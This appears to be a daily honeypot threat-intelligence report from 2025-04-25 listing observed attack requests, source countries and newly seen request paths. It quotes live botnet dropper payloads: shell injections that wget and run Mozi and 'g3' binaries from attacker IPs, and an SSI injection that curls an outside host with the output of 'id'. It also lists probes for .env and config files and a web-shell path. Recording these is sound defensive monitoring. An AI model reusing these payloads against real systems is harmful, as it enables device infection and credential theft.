Skip to main content
  1. Daily-Posts/

Report: 2025-04-25

·529 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-04-25
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 4 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 45 new requests that have never been observed before (these were added to the monitored request database.).

A total of 2001 requests were recorded during the day, originating from 4 different countries, with a peak of 584 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USGermany
USGermany
USGermany
USDubai
CNGeorgia
GBGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
123.4.49.93GET /shell?cd+/tmp;rm+-rf+*;wget+http://123.4.49.93:48403/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
83.150.218.92GET /shell?cd+/tmp;rm+-rf+g3;nohup+wget+http:/\x5C/83.150.218.222/g3;chmod+777+g3;./g3+jaws; HTTP/1.1
83.150.218.222GET /shell?cd+/tmp;rm+-rf+g3;nohup+wget+http:/\x5C/83.150.218.222/g3;chmod+777+g3;./g3+jaws; HTTP/1.1
83.150.218.222GET /shell?cd+/tmp;rm+-rf+g3;nohup+wget+http:/\x5C/83.150.218.92/g3;chmod+777+g3;./g3+jaws; HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
2141GET /config/index?time=1745596450565297336 HTTP/1.1
2151GET /api/bin/440393?time=1745597181616067725 HTTP/1.1
2161POST /api/user/binLookup?time=1745597182207159339 HTTP/1.1
2171GET /api/bin/440393?time=1745597551802198136 HTTP/1.1
2181POST /api/user/binLookup?time=1745597552192685009 HTTP/1.1
2191\x04\x01\x01\xBB@\xE9\xA3h\x00
2201\x04\x01\x01\xBB@\xE9\xA3cadm:12345\x00
2221GET /config/index?time=1745595063849169545 HTTP/1.1
2241GET /config/index?time=1745595445469337750 HTTP/1.1
2251GET /config/index?time=1745596414112870783 HTTP/1.1
2261GET /api/bin/440393?time=1745597117308227144 HTTP/1.1
2271POST /api/user/binLookup?time=1745597117816093019 HTTP/1.1
2281GET /api/bin/440393?time=1745598369839750191 HTTP/1.1
2291POST /api/user/binLookup?time=1745598370241415990 HTTP/1.1
3081POST /api/user/binLookup?time=1745598830556946095 HTTP/1.1
3441GET /VabC HTTP/1.1
3451GET /GUyH HTTP/1.1
3481GET /env.env HTTP/1.1
3551GET /env.html HTTP/1.1
3561GET /env/ HTTP/1.1
3571GET /.env/ HTTP/1.1
3581GET /.env/.env HTTP/1.1
3591GET /environment.json HTTP/1.1
3611GET /env.example HTTP/1.1
3631GET /,env HTTP/1.1
3641GET /_env HTTP/1.1
3731GET /settings.cfg HTTP/1.1
4061GET /wp-includes/ALFA_DATA/alfacgiapi/ HTTP/1.1
4311GET /config/index?time=1745597359361746420 HTTP/1.1
4321GET /config/index?time=1745598245202688129 HTTP/1.1
4331GET /api/bin/440393?time=1745598830073593270 HTTP/1.1
4401GET /OdinHttpCall1745563401 HTTP/1.1
4411GET /Odin/http/call1745563401 HTTP/1.1
4491GET /odinhttpcall1745563401 HTTP/1.1
4521GET /api/bin/440393?time=1745601698877915315 HTTP/1.1
4531POST /api/user/binLookup?time=1745601699392251016 HTTP/1.1
4741GET /incl/image_test.shtml?camnbr=%3C%21–%23exec+cmd%3D%22curl+http%3A%2F%2F107.189.21.38%2F%24%28id%29%22+–%3E HTTP/1.1
4761GET /settings.inc.php HTTP/1.1
4811GET /staging2/.env HTTP/1.1
4871GET /local.inc.php HTTP/1.1
4881GET /local.ini HTTP/1.1
4911GET /local.xml HTTP/1.1
4951\x04\x01\x01\xBB@\xE9\xA3i\x00
4961\x04\x01\x01\xBB@\xE9\xA3jadm:12345\x00
5051GET /parameters.yaml HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0584GB
1293NL
2290US
3163SC
497PL
587DE
670CN
764BG
853SG
950BE
1048IN
1133HK
1224CA
1321CH
1416HR
1515FR
1610KR
178PT
188VN
197RU
207GH
216UA
226TR
234JP
244BR
254AU
263IR
273ZA
283CO
292GE
302TH
312ID
322TW
332LT
341AL
351CZ
361HU
371MC
381NO
391PA
401IT
411BD
421AT
431AO

Related

Report: 2025-04-24
·358 words
Repport Daily
Report: 2025-04-23
·512 words
Repport Daily
Report: 2025-04-22
·410 words
Repport Daily